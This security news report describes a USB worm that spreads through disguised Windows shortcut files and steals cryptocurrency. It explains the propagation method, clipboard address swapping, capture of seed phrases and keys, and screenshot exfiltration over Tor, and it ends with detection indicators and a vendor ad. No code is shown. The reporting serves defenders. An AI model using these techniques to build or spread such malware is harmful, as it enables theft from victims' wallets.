USB worm spreads crypto-stealing malware via Windows shortcut files

18 Jun 2026, 16:20 by Bill Toulas · BleepingComputer

Threat actors targeting cryptocurrency wallets have been distributing clipboard-stealing malware with self-spreading capabilities and using the Tor network to conceal communication.

The campaign has been active since at least February and relies on LNK (shortcut) files on USB drives to push clipper malware that monitors clipboard contents and replaces cryptocurrency wallet addresses with ones controlled by the attacker.

Additionally, it monitors for seed phrases and private keys, and can capture screenshots that are exfiltrated over Tor.

Infection and worm propagation

Microsoft says that the infection process starts with the victim opening the LNK file, triggering the malware on the USB drive. Additional payloads are staged from a .ONION address.

A local scan searches for document files on the system. When such files are found, the malware hides the originals and replaces them with malicious shortcuts bearing the same names. This causes the malware to execute when users attempt to open the documents.

The worm creates a scheduled task that monitors for newly connected USB storage devices. When a removable drive is connected, the malware it copies itself to the device and creates additional malicious shortcut files.

Execution flow overview
Source: Microsoft

Data stealer

The stealer component in the malware executes after checking that Task Manager is inactive, establishing communications with the command-and-control (C2) host using a Tor executable (ugate.exe).

Every half a second, the malware checks the clipboard for the following data:

12-word BIP39 seed phrases
24-word BIP39 seed phrases
Ethereum private keys
Bitcoin WIF keys
Bitcoin legacy, P2SH, Bech32, and Taproot wallet addresses
Tron wallet addresses
Monero wallet addresses

The targeted addresses are chosen based on their starting digits or characters to partially resemble the attackers’ wallet addresses, to lower the chance of the user discovering the fraud at a quick glance.

Function to replace the wallet address
Source: Microsoft

Apart from monitoring the clipboard, the malware also captures five screenshots of the victim’s screen every ten seconds and sends them to the C2 using the curl tool.

According to Microsoft, there is also support for remote code execution, which can be triggered by a C2 EVAL instruction. Specifically, the malware downloads JavaScript content into a file named ‘cfile,’ and executes it on the infected machine.

The researchers say that the strongest indicators of an infection are behavioral rather than signature-based, and recommend monitoring for process activity on wscript.exe and cscript.exe, unexpected launches of curl, PowerShell, and cmd.exe, along with unusual child processes.

Also, connections to ‘localhost:9050’ and Tor proxy activity are red flags associated with this campaign.

Test every layer before attackers do

Security teams log 54% of successful attacks and alert on just 14%. The rest move through your environment unseen.

The Picus whitepaper shows how breach and attack simulation tests your SIEM and EDR rules so threats stop slipping by detection.

Get the whitepaper